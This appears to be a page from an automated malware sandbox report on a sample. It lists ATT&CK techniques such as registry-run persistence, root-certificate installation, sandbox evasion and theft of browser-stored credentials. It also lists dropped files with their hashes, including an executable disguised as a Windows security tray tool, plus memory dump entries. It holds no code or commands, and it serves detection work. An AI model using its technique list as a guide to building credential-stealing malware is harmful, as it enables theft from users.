Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
93a46e19db466c2b1c73db96bb50cd0d

SHA1
9ace17fdd3b9417dfe6bdb886db34c10cfc7e15f

SHA256
f3c1eb278b3d7d028e95a7296c6806b4826147ea6a9fcf1f156a859c88bafced

SHA512
f01647d30dd4bbdf123758906df97fa14d0a0d726147e0a559bff13c7097130faa05e362003cf7c040d506bd420128fa14b686bfb44bb93f00193c2c2a0ad7eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1B72.tmp

Filesize
1KB

MD5
7f4714ee7dc1f6892ce8dfb6f2eb0453

SHA1
fb7e35ea5ea5764c17c3bb9a9c79c2bcec6b2cf9

SHA256
e0e85c35a2aa4b32fcad650084a11e46cadf8e8b3dae7d8da4c76565e5c2e799

SHA512
8dcece73102c5dc1ec890a94318c5450c8b9fed49e91613b974eff0831e673bfefe5a735b201bfd7f7ef631492d1c833fa20be42276b0a06b44d382d11680596

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3ql52ki.itf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bqPyBohbzJ\Display (1).png

Filesize
405KB

MD5
7a11ea5a4dfaf6d43c65bc2b73cf4894

SHA1
ceff8a9b07f7751de133dd053ae0588939c4f8d5

SHA256
61f05ab9906082fa294635ad9d0f0e39e0e5959b83e74acb72502853351fee3c

SHA512
93ee14620443d396b13928152720c0744a79ef256b08d5a480414db3b60e8fa54cb22f1ae68b016e22f39140ce6ef23ac88bafb61408f020f2383017fbe200c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ycqtmehl\ycqtmehl.dll

Filesize
4KB

MD5
021e95969b88676456f89371f985e001

SHA1
a77a5fe680cf574dd486a42f11c59ab6539e85ff

SHA256
2da6fa445e79ab23cf6c41c9f653047c9d8eba800df2fba4312fc5bb5e563821

SHA512
c798a8bca674ce559dc371553591161884b2cc245503b3645ef5c4a76023147ab59f2078b6192dff1f8c377a9a79ce3beb9c6a12cf1e363abb62948a32248fc0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
15.3MB

MD5
5bc9c103742fa7e457e906e07832c395

SHA1
142c19a8f1dd419ce9c2f251cbc263b8abf476de

SHA256
9030098c9b2ecabe713d76727ccc2be79663d55716644446bb1482d948697e17

SHA512
1633349abd47715ed0804cb08798e9b12c862fe4239953de21481a07de502d13be74879e8ce7a962c1c68e1c967b47337095cc7458c40e702023d6f241536221

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ycqtmehl\CSCC3CDCE328F34480D9A67FB1C209964A5.TMP

Filesize
652B

MD5
0c3baa884f3924dc427680bb93c0988c

SHA1
ecea5d5cb8c8a7fe6f86bb8a7ae00b80a1df147d

SHA256
8738bd00ad77e448cffbea97e54f1ee4787dd51f0ee53c34d90b51e954e4b418

SHA512
8f2f9213f21eb6e03974643a8d9c11ebd5823ffdb4872324f697472bc0bc1d0ba7569aa8683ed04d25feeb4a482a5b936e1c413481e604fccb04417be3feddb4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ycqtmehl\ycqtmehl.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ycqtmehl\ycqtmehl.cmdline

Filesize
607B

MD5
7cf724b44d552476e51643d5bc4829bb

SHA1
e945baa911828db6ce1753c2f063afdc7a74ddd7

SHA256
e8929ded970f007be3256e36c2246b3fd5b871fca612a3fc3f97c4d5492671ec

SHA512
e5d3c631df3addd44444fde2bab36ce9e8b294365d9384248e64cc9c605e1e747b4cf0c663f8786a688d4925acd51c7e2c29fb36d7fa9d1d467bdb1d4a6b20f3

Download Submit
memory/2008-66-0x000001987F040000-0x000001987F048000-memory.dmp

Filesize
32KB

Download
memory/3176-8-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-0-0x00007FF9A9387000-0x00007FF9A9389000-memory.dmp

Filesize
8KB

Download
memory/3176-11-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-2-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-5-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-44-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-10-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-71-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-7-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-9-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-3-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-6-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-4-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/3176-1-0x0000000000400000-0x00000000019DB000-memory.dmp

Filesize
21.9MB

Download
memory/4788-21-0x0000029EDFED0000-0x0000029EDFEF2000-memory.dmp

Filesize
136KB

Download